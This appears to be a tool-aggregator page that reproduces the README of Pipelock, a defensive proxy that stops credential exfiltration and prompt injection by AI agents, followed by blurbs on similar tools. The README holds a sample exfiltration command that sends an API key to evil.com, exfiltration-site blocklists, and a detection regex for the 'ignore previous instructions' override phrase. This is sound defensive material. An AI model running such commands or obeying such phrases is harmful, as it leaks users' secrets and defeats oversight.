pipelock

Security harness for AI agents — egress proxy with DLP scanning, SSRF protection, MCP response scanning, and workspace integrity monitoring

Stars: 82

Pipelock is an all-in-one security harness for AI agents. It controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity. It uses capability separation: the agent process, which holds the secrets, is network-restricted, while a separate fetch proxy that holds no secrets handles web browsing. Every request passes through a 7-layer scanner pipeline. Pipelock is aimed at anyone running Claude Code, OpenHands, or any other AI agent with shell access and API keys.

README:

All-in-one security harness for AI agents. One binary, zero dependencies. Controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity.

If you run Claude Code, OpenHands, or any AI agent with shell access and API keys, this is for you.


If Pipelock is useful, a star helps others find it.

AI agents run with shell access, API keys in their environment, and unrestricted internet access. A compromised agent can exfiltrate secrets with one HTTP request:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY" # game over

Pipelock uses capability separation — the agent process (which has secrets) is network-restricted, while a separate fetch proxy (which has NO secrets) handles web browsing. Every request goes through a 7-layer scanner pipeline.

flowchart LR

subgraph PRIVILEGED["Privileged Zone"]

Agent["AI Agent\n(has API keys)"]

end

subgraph FETCH["Fetch Zone"]

Proxy["Fetch Proxy\n(NO secrets)"]

Scanner["Scanner Pipeline\nSSRF · Blocklist · Rate Limit\nDLP · Env Leak · Entropy · Length"]

end

subgraph NET["Internet"]

Web["Web"]

end

Agent -- "fetch URL" --> Proxy

Proxy --> Scanner

Scanner -- "clean content" --> Agent

Scanner -- "request" --> Web

style PRIVILEGED fill:#fee,stroke:#c33

style FETCH fill:#efe,stroke:#3a3

style NET fill:#eef,stroke:#33c

Text diagram (for terminals / non-mermaid renderers)

┌──────────────────────┐         ┌─────────────────────┐
│  PRIVILEGED ZONE     │         │  FETCH ZONE         │
│                      │         │                     │
│  AI Agent            │  IPC    │  Fetch Proxy        │
│  - Has API keys      │────────>│  - NO secrets       │
│  - Has credentials   │ "fetch  │  - Full internet    │
│  - Restricted network│  url"   │  - Returns text     │
│                      │<────────│  - URL scanning     │
│  Can reach:          │ content │  - Audit logging    │
│  ✓ api.anthropic.com │         │                     │
│  ✓ discord.com       │         │  Can reach:         │
│  ✗ evil.com          │         │  ✓ Any URL          │
│  ✗ pastebin.com      │         │  But has:           │
└──────────────────────┘         │  ✗ No env secrets   │
                                 │  ✗ No credentials   │
                                 └─────────────────────┘

| | Pipelock | Scanners (mcp-scan) | Sandboxes (srt) | Kernel agents (agentsh) |
|---|---|---|---|---|
| Secret exfiltration prevention | Yes | No | Partial (domain-level) | Yes |
| DLP + entropy analysis | Yes | No | No | Partial |
| Prompt injection detection | Yes | Yes | No | No |
| Workspace integrity monitoring | Yes | No | No | Partial |
| MCP response scanning | Yes | Yes | No | No |
| Single binary, zero deps | Yes | No (Python) | No (npm) | No (kernel modules) |
| Audit logging + Prometheus | Yes | No | No | No |

Full comparison: docs/comparison.md

# Install (requires Go 1.24+)

go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

# Scan your project and generate a tailored config

pipelock audit . -o pipelock.yaml

# Start the proxy

pipelock run --config pipelock.yaml

# Test: this should be blocked

pipelock check --url "https://pastebin.com/raw/abc123"

Or with Docker:

docker pull ghcr.io/luckypipewrench/pipelock:latest

docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
  ghcr.io/luckypipewrench/pipelock:latest \
  run --config /config/pipelock.yaml --listen 0.0.0.0:8888

| Threat | Coverage |
|---|---|
| ASI01 Prompt Injection | Strong: response + MCP scanning |
| ASI02 Insecure Tool Implementation | Partial: proxy as controlled tool, MCP scanning |
| ASI03 Privilege Escalation | Strong: capability separation + SSRF protection |
| ASI04 Insecure Output Handling | Strong: response scanning with block/strip/warn |
| ASI05 Multi-Agent Orchestration | Partial: agent ID, integrity, signing |
| ASI06 Excessive Agency | Strong: domain allowlist + rate limiting |
| ASI07 Supply Chain Attacks | Partial: integrity monitoring + MCP scanning |
| ASI08 Knowledge Base Poisoning | Moderate: injection detection on fetched content |
| ASI09 Insufficient Logging | Strong: structured JSON + Prometheus |
| ASI10 Uncontrolled Resource Consumption | Strong: rate limiting + size limits |

Details, config examples, and gap analysis: docs/owasp-mapping.md

| Mode | Security | Web Browsing | Use Case |
|---|---|---|---|
| strict | Airtight | None | Regulated industries, high-security |
| balanced | Blocks naive + detects sophisticated | Via fetch proxy | Most developers (default) |
| audit | Logging only | Unrestricted | Evaluation before enforcement |

What each mode prevents, detects, or logs:

| Attack Vector | Strict | Balanced | Audit |
|---|---|---|---|
| curl evil.com -d $SECRET | Prevented | Prevented | Logged |
| Secret in URL query params | Prevented | Detected (DLP scan) | Logged |
| Base64-encoded secret in URL | Prevented | Detected (entropy scan) | Logged |
| DNS tunneling | Prevented | Prevented (restricted DNS) | Logged |
| Chunked exfiltration | Prevented | Detected (rate limiting) | Logged |
| Public-key encrypted blob in URL | Prevented | Logged (entropy flags it) | Logged |

Honest assessment: Strict mode provides mathematical certainty. Balanced mode raises the bar from "one curl command" to "sophisticated pre-planned attack." Audit mode gives you visibility you don't have today.

Scan any project directory to detect security risks and generate a tailored config:

pipelock audit ./my-project -o pipelock-suggested.yaml

Detects agent type (Claude Code, Cursor, CrewAI, LangGraph, AutoGen), programming languages, package ecosystems, MCP servers, and secrets in environment variables and config files. Outputs a security score and a suggested config file tuned for your project.

The fetch proxy runs a 7-layer scanner pipeline on every request:

- SSRF protection — blocks internal/private IPs with DNS rebinding prevention

- Domain blocklist — blocks known exfiltration targets (pastebin, transfer.sh)

- Rate limiting — per-domain sliding window

- DLP patterns — regex matching for API keys, tokens, and secrets

- Environment variable leak detection — detects the proxy's own env var values in URLs (raw + base64, values must be 16+ chars with entropy > 3.0)

- Entropy analysis — Shannon entropy flags encoded/encrypted data in URL segments

- URL length limits — unusually long URLs suggest data exfiltration
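The entropy and environment-leak layers in the list above can be sketched in a few lines of Python. This is an illustration, not Pipelock's own (Go) implementation: the function names, the 20-character minimum segment length, and the choice to scan path components and query values are assumptions. The 4.5 threshold mirrors `entropy_threshold` in the sample config, and the 16-character / 3.0-entropy floor comes from the list above.

```python
import base64
import math
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit


def shannon_entropy(text: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    return sum((n / total) * math.log2(total / n) for n in Counter(text).values())


def url_segments(url: str) -> list:
    """Path components and query values (assumed to be the scanned parts)."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    segments += [value for _, value in parse_qsl(parts.query)]
    return segments


def high_entropy_segments(url: str, threshold: float = 4.5, min_len: int = 20) -> list:
    """Segments long enough to judge whose entropy exceeds the threshold."""
    return [s for s in url_segments(url)
            if len(s) >= min_len and shannon_entropy(s) > threshold]


def leaked_env_names(url: str, env: dict) -> list:
    """Names of env vars whose value appears in the URL, raw or base64-encoded."""
    haystacks = (url, unquote(url))
    hits = []
    for name, value in env.items():
        # Skip short or low-entropy values (rule from the list: 16+ chars, entropy > 3.0).
        if len(value) < 16 or shannon_entropy(value) <= 3.0:
            continue
        encoded = base64.b64encode(value.encode()).decode().rstrip("=")
        if any(value in h or encoded in h for h in haystacks):
            hits.append(name)
    return hits
```

Calling `leaked_env_names(url, dict(os.environ))` would approximate the "proxy's own env var values" check. A real scanner would likely also handle other encodings (hex, URL-safe base64), which this sketch omits.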

Fetched content is scanned for prompt injection before reaching the agent:

- Prompt injection — "ignore previous instructions" and variants

- System/role overrides — attempts to hijack system prompts

- Jailbreak attempts — DAN mode, developer mode, etc.

Actions: block (reject entirely), strip (redact matched text), warn (log and pass through), ask (terminal y/N/s prompt with timeout — requires TTY)
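As a rough illustration of how the block, strip, and warn actions differ, the sketch below applies the prompt-injection regex from the sample config to fetched text. The function name, the return shape, and the `[REDACTED]` marker are assumptions made for this example; the interactive ask action is left out because it needs a TTY.

```python
import re
from typing import List, Optional, Tuple

# Same pattern as the response_scanning example in the sample config.
INJECTION = re.compile(
    r"(?i)(ignore|disregard)\s+(all\s+)?(previous|prior)\s+(instructions|prompts)"
)


def scan_response(content: str, action: str = "warn") -> Tuple[Optional[str], List[str]]:
    """Return (content to hand to the agent, matched phrases)."""
    findings = [m.group(0) for m in INJECTION.finditer(content)]
    if not findings:
        return content, findings
    if action == "block":
        return None, findings  # reject the whole response
    if action == "strip":
        return INJECTION.sub("[REDACTED]", content), findings
    if action == "warn":
        return content, findings  # caller logs the findings; content passes through
    raise ValueError(f"unsupported action: {action}")
```

With strip, the agent still sees the surrounding page text, which is usually less disruptive than block while removing the matched phrase itself.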

pipelock integrity init ./workspace --exclude "logs/**"

pipelock integrity check ./workspace # exit 0 = clean

pipelock integrity check ./workspace --json # machine-readable

pipelock integrity update ./workspace # re-hash after review

SHA256 manifests detect modified, added, or removed files. See lateral movement in multi-agent systems.
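The idea behind a SHA256 manifest is simple enough to sketch: hash every file, store the path-to-digest map, and compare two maps later. The code below is a minimal Python illustration under assumed names (`build_manifest`, `diff_manifests`) and an assumed glob-style exclusion rule; it does not reproduce Pipelock's manifest format.

```python
import hashlib
from fnmatch import fnmatch
from pathlib import Path


def build_manifest(root, exclude=()):
    """Map each file's relative POSIX path to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(fnmatch(rel, pattern) for pattern in exclude):
            continue  # e.g. "logs/**"
        manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifests(old, new):
    """Classify paths as added, removed, or modified between two manifests."""
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }
```

An empty result in all three lists corresponds to the "clean" case; anything else is a change that should be reviewed before the manifest is re-hashed.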

git diff HEAD~1 | pipelock git scan-diff # scan for secrets in unified diff

pipelock git install-hooks --config pipelock.yaml # pre-push hook

Input must be unified diff format (with +++ b/filename headers and + lines). Plain text won't match.
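To show why plain text does not match, here is a small Python sketch of a unified-diff scanner: it only inspects lines that start with `+` and only after it has seen a `+++` file header. The two regexes are the DLP examples from the sample config; the function name and the `(file, line, pattern)` result shape are assumptions for illustration, not Pipelock's output format.

```python
import re

# DLP patterns copied from the sample config.
DLP_PATTERNS = {
    "Anthropic API Key": re.compile(r"sk-ant-[a-zA-Z0-9\-_]{20,}"),
    "AWS Access Key": re.compile(r"AKIA[0-9A-Z]{16}"),
}
HUNK_HEADER = re.compile(r"@@ -\d+(?:,\d+)? \+(\d+)")


def scan_unified_diff(diff_text):
    """Return (file, new-file line number, pattern name) for secrets in added lines."""
    findings = []
    current_file = None
    new_line = 0
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            target = line[4:].strip()
            current_file = target[2:] if target.startswith("b/") else target
        elif line.startswith("@@"):
            match = HUNK_HEADER.match(line)
            new_line = int(match.group(1)) if match else 0
        elif line.startswith("+") and current_file:
            for name, pattern in DLP_PATTERNS.items():
                if pattern.search(line[1:]):
                    findings.append((current_file, new_line, name))
            new_line += 1
        elif line.startswith(" "):
            new_line += 1  # context line: present in the new file
    return findings
```

This sketch treats any line beginning with `+++ ` as a file header, so an added line whose content itself starts with `++ ` would be misread; a stricter parser would track hunk lengths.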

pipelock keygen my-bot # generate key pair

pipelock sign manifest.json --agent my-bot # sign a file

pipelock verify manifest.json --agent my-bot # verify signature

pipelock trust other-bot /path/to/other-bot.pub # trust a peer

Keys stored under ~/.pipelock/agents/ and ~/.pipelock/trusted_keys/.

Wrap any MCP server as a stdio proxy. Pipelock forwards client requests unmodified and scans every server response for prompt injection before returning it:

# Wrap an MCP server (use in .mcp.json for Claude Code)

pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# Batch scan (stdin)

mcp-server | pipelock mcp scan

pipelock mcp scan --json --config pipelock.yaml < responses.jsonl

Catches injection split across content blocks. Exit 0 if clean, 1 if injection detected.
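One way to catch an injection phrase that is split across content blocks is to scan the concatenated text rather than each block alone. The Python sketch below does that for a single JSON-RPC 2.0 response line whose `result.content` is a list of text blocks. The function name, the join strategy (with and without a space), and the reuse of the sample-config regex are assumptions, not a description of Pipelock's scanner.

```python
import json
import re

INJECTION = re.compile(
    r"(?i)(ignore|disregard)\s+(all\s+)?(previous|prior)\s+(instructions|prompts)"
)


def mcp_response_has_injection(line: str) -> bool:
    """Scan the text blocks of one JSON-RPC response as a single joined string."""
    message = json.loads(line)
    result = message.get("result")
    blocks = result.get("content", []) if isinstance(result, dict) else []
    texts = [b.get("text", "") for b in blocks
             if isinstance(b, dict) and b.get("type") == "text"]
    # Try both joins so a phrase split mid-word or at a word boundary is still seen.
    return any(INJECTION.search(sep.join(texts)) for sep in (" ", ""))
```

A batch wrapper would run this over each line of a `.jsonl` file and exit with status 1 if any line returns `True`, matching the exit codes described above.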

Each agent identifies itself via the X-Pipelock-Agent header (or the ?agent= query parameter). All audit logs include the agent name for per-agent filtering.

curl -H "X-Pipelock-Agent: my-bot" "http://localhost:8888/fetch?url=https://example.com"

version: 1

mode: balanced
enforce: true # set false for audit mode (log without blocking)

api_allowlist:
  - "*.anthropic.com"
  - "*.openai.com"
  - "*.discord.com"
  - "github.com"

fetch_proxy:
  listen: "127.0.0.1:8888"
  timeout_seconds: 30
  max_response_mb: 10
  user_agent: "Pipelock Fetch/1.0"
  monitoring:
    entropy_threshold: 4.5
    max_url_length: 2048
    max_requests_per_minute: 60
    blocklist:
      - "*.pastebin.com"
      - "*.transfer.sh"

dlp:
  scan_env: true
  patterns:
    - name: "Anthropic API Key"
      regex: 'sk-ant-[a-zA-Z0-9\-_]{20,}'
      severity: critical
    - name: "AWS Access Key"
      regex: 'AKIA[0-9A-Z]{16}'
      severity: critical

response_scanning:
  enabled: true
  action: warn # block, strip, or warn
  patterns:
    - name: "Prompt Injection"
      regex: '(?i)(ignore|disregard)\s+(all\s+)?(previous|prior)\s+(instructions|prompts)'

logging:
  format: json
  output: stdout
  include_allowed: true
  include_blocked: true

internal:
  - "127.0.0.0/8"
  - "10.0.0.0/8"
  - "172.16.0.0/12"
  - "192.168.0.0/16"
  - "169.254.0.0/16"
  - "::1/128"
  - "fc00::/7"
  - "fe80::/10"

git_protection:
  enabled: false
  allowed_branches: ["feature/*", "fix/*", "main"]

  pre_push_scan: true

| Preset | Mode | Action | Best For |
|---|---|---|---|
| configs/balanced.yaml | balanced | warn | General purpose |
| configs/strict.yaml | strict | block | High-security environments |
| configs/audit.yaml | audit | warn | Log-only monitoring |
| configs/claude-code.yaml | balanced | block | Claude Code (unattended) |
| configs/cursor.yaml | balanced | block | Cursor IDE (unattended) |
| configs/generic-agent.yaml | balanced | warn | New agents (tuning phase) |

- Claude Code: MCP proxy setup, .claude.json configuration, HTTP fetch proxy hooks
- Cursor: use configs/cursor.yaml with the same MCP proxy pattern as Claude Code

# .github/workflows/agent-security.yaml
name: Agent Security
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - uses: actions/setup-go@v5
        with:
          go-version: '1.24'
      - run: go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
      - name: Check config
        run: pipelock check --config pipelock.yaml
      - name: Scan diff for secrets
        run: git diff origin/main...HEAD | pipelock git scan-diff --config pipelock.yaml
      - name: Verify workspace integrity
        run: pipelock integrity check ./

# Pull from GHCR

docker pull ghcr.io/luckypipewrench/pipelock:latest

docker run -p 8888:8888 ghcr.io/luckypipewrench/pipelock:latest

# Build locally

docker build -t pipelock .

docker run -p 8888:8888 pipelock

# Network-isolated agent (Docker Compose)

pipelock generate docker-compose --agent claude-code -o docker-compose.yaml

docker compose up

The generated compose file creates two containers: pipelock (fetch proxy with internet) and agent (your AI agent on an internal-only network, can only reach pipelock).

Fetch proxy endpoints

# Fetch a URL (returns extracted text content)

curl "http://localhost:8888/fetch?url=https://example.com"

# Health check

curl "http://localhost:8888/health"

# Prometheus metrics

curl "http://localhost:8888/metrics"

# JSON stats (top blocked domains, scanner hits, block rate)

curl "http://localhost:8888/stats"

Fetch response:

{
  "url": "https://example.com",
  "agent": "my-bot",
  "status_code": 200,
  "content_type": "text/html",
  "title": "Example Domain",
  "content": "This domain is for use in illustrative examples...",
  "blocked": false
}

Health response:

{
  "status": "healthy",
  "version": "x.y.z",
  "mode": "balanced",
  "uptime_seconds": 3600.5,
  "dlp_patterns": 8,
  "response_scan_enabled": true,
  "git_protection_enabled": false,
  "rate_limit_enabled": true
}

Stats response:

{
  "uptime_seconds": 3600.5,
  "requests": {
    "total": 150,
    "allowed": 142,
    "blocked": 8,
    "block_rate": 0.053
  },
  "top_blocked_domains": [
    {"name": "pastebin.com", "count": 5},
    {"name": "transfer.sh", "count": 3}
  ],
  "top_scanners": [
    {"name": "blocklist", "count": 5},
    {"name": "dlp", "count": 3}
  ]
}

make build # Build with version metadata

make test # Run tests

make lint # Lint

make docker # Build Docker image

cmd/pipelock/    CLI entry point
internal/
  cli/           Cobra commands (run, check, generate, logs, git, integrity, mcp,
                 keygen, sign, verify, trust, version, healthcheck)
  config/        YAML config loading, validation, defaults, hot-reload (fsnotify)
  scanner/       URL scanning (SSRF, blocklist, rate limit, DLP, entropy, env leak)
  audit/         Structured JSON audit logging (zerolog)
  proxy/         Fetch proxy HTTP server (go-readability, agent ID, DNS pinning)
  metrics/       Prometheus metrics + JSON stats endpoint
  gitprotect/    Git-aware security (diff scanning, branch validation, hooks)
  integrity/     File integrity monitoring (SHA256 manifests, check/diff, exclusions)
  signing/       Ed25519 key management, file signing, signature verification
  mcp/           MCP stdio proxy + JSON-RPC 2.0 response scanning
  hitl/          Human-in-the-loop terminal approval (ask action)
configs/         Preset config files (strict, balanced, audit, claude-code, cursor, generic-agent)
docs/            OWASP mapping, tool comparison
blog/            Blog posts (mirrored at pipelab.org/blog/)

- Architecture influenced by Anthropic's Claude Code sandboxing and sandbox-runtime

- Threat model informed by OWASP Agentic AI Top 10

- See docs/comparison.md for how Pipelock relates to AIP, agentsh, and srt

- Security review contributions from Dylan Corrales

Apache License 2.0 — Copyright 2026 Josh Waldrep

See LICENSE for the full text.


Similar Open Source Tools

pipelock

Pipelock is an all-in-one security harness designed for AI agents, offering control over network egress, detection of credential exfiltration, scanning for prompt injection, and monitoring workspace integrity. It utilizes capability separation to restrict the agent process with secrets and employs a separate fetch proxy for web browsing. The tool runs a 7-layer scanner pipeline on every request to ensure security. Pipelock is suitable for users running AI agents like Claude Code, OpenHands, or any AI agent with shell access and API keys.

gpt-load

GPT-Load is a high-performance, enterprise-grade AI API transparent proxy service designed for enterprises and developers needing to integrate multiple AI services. Built with Go, it features intelligent key management, load balancing, and comprehensive monitoring capabilities for high-concurrency production environments. The tool serves as a transparent proxy service, preserving native API formats of various AI service providers like OpenAI, Google Gemini, and Anthropic Claude. It supports dynamic configuration, distributed leader-follower deployment, and a Vue 3-based web management interface. GPT-Load is production-ready with features like dual authentication, graceful shutdown, and error recovery.

augustus

Augustus is a Go-based LLM vulnerability scanner designed for security professionals to test large language models against a wide range of adversarial attacks. It integrates with 28 LLM providers, covers 210+ adversarial attacks including prompt injection, jailbreaks, encoding exploits, and data extraction, and produces actionable vulnerability reports. The tool is built for production security testing with features like concurrent scanning, rate limiting, retry logic, and timeout handling out of the box.

shodh-memory

Shodh-Memory is a cognitive memory system designed for AI agents to persist memory across sessions, learn from experience, and run entirely offline. It features Hebbian learning, activation decay, and semantic consolidation, packed into a single ~17MB binary. Users can deploy it on cloud, edge devices, or air-gapped systems to enhance the memory capabilities of AI agents.

dexto

Dexto is a lightweight runtime for creating and running AI agents that turn natural language into real-world actions. It serves as the missing intelligence layer for building AI applications, standalone chatbots, or as the reasoning engine inside larger products. Dexto features a powerful CLI and Web UI for running AI agents, supports multiple interfaces, allows hot-swapping of LLMs from various providers, connects to remote tool servers via the Model Context Protocol, is config-driven with version-controlled YAML, offers production-ready core features, extensibility for custom services, and enables multi-agent collaboration via MCP and A2A.

mcp-context-forge

MCP Context Forge is a powerful tool for generating context-aware data for machine learning models. It provides functionalities to create diverse datasets with contextual information, enhancing the performance of AI algorithms. The tool supports various data formats and allows users to customize the context generation process easily. With MCP Context Forge, users can efficiently prepare training data for tasks requiring contextual understanding, such as sentiment analysis, recommendation systems, and natural language processing.

google_workspace_mcp

The Google Workspace MCP Server is a production-ready server that integrates major Google Workspace services with AI assistants. It supports single-user and multi-user authentication via OAuth 2.1, making it a powerful backend for custom applications. Built with FastMCP for optimal performance, it features advanced authentication handling, service caching, and streamlined development patterns. The server provides full natural language control over Google Calendar, Drive, Gmail, Docs, Sheets, Slides, Forms, Tasks, and Chat through all MCP clients, AI assistants, and developer tools. It supports free Google accounts and Google Workspace plans with expanded app options like Chat & Spaces. The server also offers private cloud instance options.

kiss_ai

KISS AI is a lightweight and powerful multi-agent evolutionary framework that simplifies building AI agents. It uses native function calling for efficiency and accuracy, making building AI agents as straightforward as possible. The framework includes features like multi-agent orchestration, agent evolution and optimization, relentless coding agent for long-running tasks, output formatting, trajectory saving and visualization, GEPA for prompt optimization, KISSEvolve for algorithm discovery, self-evolving multi-agent, Docker integration, multiprocessing support, and support for various models from OpenAI, Anthropic, Gemini, Together AI, and OpenRouter.

LocalAGI

LocalAGI is a powerful, self-hostable AI Agent platform that allows you to design AI automations without writing code. It provides a complete drop-in replacement for OpenAI's Responses APIs with advanced agentic capabilities. With LocalAGI, you can create customizable AI assistants, automations, chat bots, and agents that run 100% locally, without the need for cloud services or API keys. The platform offers features like no-code agents, web-based interface, advanced agent teaming, connectors for various platforms, comprehensive REST API, short & long-term memory capabilities, planning & reasoning, periodic tasks scheduling, memory management, multimodal support, extensible custom actions, fully customizable models, observability, and more.

paperbanana

PaperBanana is an automated academic illustration tool designed for AI scientists. It implements an agentic framework for generating publication-quality academic diagrams and statistical plots from text descriptions. The tool utilizes a two-phase multi-agent pipeline with iterative refinement, Gemini-based VLM planning, and image generation. It offers a CLI, Python API, and MCP server for IDE integration, along with Claude Code skills for generating diagrams, plots, and evaluating diagrams. PaperBanana is not affiliated with or endorsed by the original authors or Google Research, and it may differ from the original system described in the paper.

ProxyPilot

ProxyPilot is a powerful local API proxy tool built in Go that eliminates the need for separate API keys when using Claude Code, Codex, Gemini, Kiro, and Qwen subscriptions with any AI coding tool. It handles OAuth authentication, token management, and API translation automatically, providing a single server to route requests. The tool supports multiple authentication providers, universal API translation, tool calling repair, extended thinking models, OAuth integration, multi-account support, quota auto-switching, usage statistics tracking, context compression, agentic harness for coding agents, session memory, system tray app, auto-updates, rollback support, and over 60 management APIs. ProxyPilot also includes caching layers for response and prompt caching to reduce latency and token usage.

botserver

General Bots is a self-hosted AI automation platform and LLM conversational platform focused on convention over configuration and code-less approaches. It serves as the core API server handling LLM orchestration, business logic, database operations, and multi-channel communication. The platform offers features like multi-vendor LLM API, MCP + LLM Tools Generation, Semantic Caching, Web Automation Engine, Enterprise Data Connectors, and Git-like Version Control. It enforces a ZERO TOLERANCE POLICY for code quality and security, with strict guidelines for error handling, performance optimization, and code patterns. The project structure includes modules for core functionalities like Rhai BASIC interpreter, security, shared types, tasks, auto task system, file operations, learning system, and LLM assistance.

alphora

Alphora is a full-stack framework for building production AI agents, providing agent orchestration, prompt engineering, tool execution, memory management, streaming, and deployment with an async-first, OpenAI-compatible design. It offers features like agent derivation, reasoning-action loop, async streaming, visual debugger, OpenAI compatibility, multimodal support, tool system with zero-config tools and type safety, prompt engine with dynamic prompts, memory and storage management, sandbox for secure execution, deployment as API, and more. Alphora allows users to build sophisticated AI agents easily and efficiently.

agentops

AgentOps is a toolkit for evaluating and developing robust and reliable AI agents. It provides benchmarks, observability, and replay analytics to help developers build better agents. AgentOps is open beta and can be signed up for here. Key features of AgentOps include: - Session replays in 3 lines of code: Initialize the AgentOps client and automatically get analytics on every LLM call. - Time travel debugging: (coming soon!) - Agent Arena: (coming soon!) - Callback handlers: AgentOps works seamlessly with applications built using Langchain and LlamaIndex.



9router

9Router is a free AI router tool designed to help developers maximize their AI subscriptions, auto-route to free and cheap AI models with smart fallback, and avoid hitting limits and wasting money. It offers features like real-time quota tracking, format translation between OpenAI, Claude, and Gemini, multi-account support, auto token refresh, custom model combinations, request logging, cloud sync, usage analytics, and flexible deployment options. The tool supports various providers like Claude Code, Codex, Gemini CLI, GitHub Copilot, GLM, MiniMax, iFlow, Qwen, and Kiro, and allows users to create combos for different scenarios. Users can connect to the tool via CLI tools like Cursor, Claude Code, Codex, OpenClaw, and Cline, and deploy it on VPS, Docker, or Cloudflare Workers.

PraisonAI

Praison AI is a low-code, centralised framework that simplifies the creation and orchestration of multi-agent systems for various LLM applications. It emphasizes ease of use, customization, and human-agent interaction. The tool leverages AutoGen and CrewAI frameworks to facilitate the development of AI-generated scripts and movie concepts. Users can easily create, run, test, and deploy agents for scriptwriting and movie concept development. Praison AI also provides options for full automatic mode and integration with OpenAI models for enhanced AI capabilities.

For similar tasks

pipelock

Pipelock is an all-in-one security harness designed for AI agents, offering control over network egress, detection of credential exfiltration, scanning for prompt injection, and monitoring workspace integrity. It utilizes capability separation to restrict the agent process with secrets and employs a separate fetch proxy for web browsing. The tool runs a 7-layer scanner pipeline on every request to ensure security. Pipelock is suitable for users running AI agents like Claude Code, OpenHands, or any AI agent with shell access and API keys.

For similar jobs

sweep

Sweep is an AI junior developer that turns bugs and feature requests into code changes. It automatically handles developer experience improvements like adding type hints and improving test coverage.

teams-ai

The Teams AI Library is a software development kit (SDK) that helps developers create bots that can interact with Teams and Microsoft 365 applications. It is built on top of the Bot Framework SDK and simplifies the process of developing bots that interact with Teams' artificial intelligence capabilities. The SDK is available for JavaScript/TypeScript, .NET, and Python.

ai-guide

This guide is dedicated to Large Language Models (LLMs) that you can run on your home computer. It assumes your PC is a lower-end, non-gaming setup.

classifai

Supercharge WordPress Content Workflows and Engagement with Artificial Intelligence. Tap into leading cloud-based services like OpenAI, Microsoft Azure AI, Google Gemini and IBM Watson to augment your WordPress-powered websites. Publish content faster while improving SEO performance and increasing audience engagement. ClassifAI integrates Artificial Intelligence and Machine Learning technologies to lighten your workload and eliminate tedious tasks, giving you more time to create original content that matters.

chatbot-ui

Chatbot UI is an open-source AI chat app that allows users to create and deploy their own AI chatbots. It is easy to use and can be customized to fit any need. Chatbot UI is perfect for businesses, developers, and anyone who wants to create a chatbot.

BricksLLM

BricksLLM is a cloud native AI gateway written in Go. Currently, it provides native support for OpenAI, Anthropic, Azure OpenAI and vLLM. BricksLLM aims to provide enterprise level infrastructure that can power any LLM production use cases. Here are some use cases for BricksLLM: * Set LLM usage limits for users on different pricing tiers * Track LLM usage on a per user and per organization basis * Block or redact requests containing PIIs * Improve LLM reliability with failovers, retries and caching * Distribute API keys with rate limits and cost limits for internal development/production use cases * Distribute API keys with rate limits and cost limits for students

uAgents

uAgents is a Python library developed by Fetch.ai that allows for the creation of autonomous AI agents. These agents can perform various tasks on a schedule or take action on various events. uAgents are easy to create and manage, and they are connected to a fast-growing network of other uAgents. They are also secure, with cryptographically secured messages and wallets.

griptape

Griptape is a modular Python framework for building AI-powered applications that securely connect to your enterprise data and APIs. It offers developers the ability to maintain control and flexibility at every step. Griptape's core components include Structures (Agents, Pipelines, and Workflows), Tasks, Tools, Memory (Conversation Memory, Task Memory, and Meta Memory), Drivers (Prompt and Embedding Drivers, Vector Store Drivers, Image Generation Drivers, Image Query Drivers, SQL Drivers, Web Scraper Drivers, and Conversation Memory Drivers), Engines (Query Engines, Extraction Engines, Summary Engines, Image Generation Engines, and Image Query Engines), and additional components (Rulesets, Loaders, Artifacts, Chunkers, and Tokenizers). Griptape enables developers to create AI-powered applications with ease and efficiency.